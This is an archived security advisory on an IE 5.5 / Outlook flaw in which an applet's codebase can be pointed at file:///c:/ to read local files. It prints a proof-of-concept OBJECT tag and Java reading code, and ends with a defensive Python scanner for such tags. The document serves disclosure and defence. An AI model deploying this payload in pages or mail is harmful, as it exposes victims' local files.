COMMAND
Internet Explorer
SYSTEMS AFFECTED
IE 5.5/Outlook/Outlook Express
PROBLEM
The following is based on Georgi Guninski security advisory #24.
A security vulnerability in IE 5.5/Outlook/Outlook Express allows
reading local files, arbitrary URLs and the local directory
structure after the user views a web page or reads an HTML
message.
The problem is that an arbitrary codebase can be specified for an
applet loaded from an <OBJECT> tag and a jar file. Applets may
read URLs from their codebase and communicate with hosts from
the codebase. The following code:
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
sets the applet's codebase to file:///c:/
This is not a Java language problem, and we suppose it is not a
problem in Microsoft's VM, but a problem in the way the codebase
is set by IE.
The code is:
---------javacodebase1.html------------------------------------------
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
---------------------------------------------------------------------
--------gjavacodebase.java-------------------------------------------
......
try
{
    u = new URL(getParameter("URL"));
    InputStream is=u.openStream();
    byte ba[]=new byte[1000];
    int l=is.read(ba);
    InputStream os=u.openConnection().getInputStream();
    String s1=new String(ba,0,l);
    print(u.toString());
    print(s1);
}
.......
---------------------------------------------------------------------
A demonstration is available at:
http://www.guninski.com/javacodebase1.html
SOLUTION
Disable Java. MS is working on a patch.
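Until a patch is available, HTML mail and proxied pages can also be screened for the pattern shown above. The following is an added example, not part of the original advisory: it flags Java OBJECT tags whose CODEBASE is a file: URL or whose CODEBASE origin differs from the ARCHIVE origin. The class and function names and the benign sample tag are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

class AppletObjects(HTMLParser):
    """Collect the PARAMs of every <OBJECT CLASSID=JAVA:...> element."""
    def __init__(self):
        super().__init__()
        self.objects, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}  # names arrive lowercased
        if tag == "object":
            java = a.get("classid", "").lower().startswith("java:")
            self._cur = {"classid": a["classid"], "params": {}} if java else None
            if java:
                self.objects.append(self._cur)
        elif tag == "param" and self._cur is not None:
            self._cur["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._cur = None

def origin(url):
    parts = urlsplit(url)
    return parts.scheme.lower(), parts.netloc.lower()

def find_suspicious_applets(html):
    """Return (classid, reason) for applets whose CODEBASE is local or foreign."""
    parser = AppletObjects()
    parser.feed(html)
    parser.close()
    findings = []
    for obj in parser.objects:
        codebase = origin(obj["params"].get("codebase", ""))
        archive = origin(obj["params"].get("archive", ""))
        if codebase[0] == "file":
            findings.append((obj["classid"], "CODEBASE is a local file: URL"))
        elif codebase[0] and archive[0] and codebase != archive:
            findings.append((obj["classid"], "CODEBASE origin differs from ARCHIVE"))
    return findings

# The OBJECT tag from the advisory, and a constructed benign tag for comparison.
ADVISORY_TAG = '''<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt"></OBJECT>'''
BENIGN_TAG = '''<object classid="java:Clock.class">
<param name="archive" value="http://applets.example.com/clock.jar">
<param name="codebase" value="http://applets.example.com/"></object>'''
```

find_suspicious_applets(ADVISORY_TAG) reports the advisory's tag as a local file: CODEBASE, while BENIGN_TAG yields no findings.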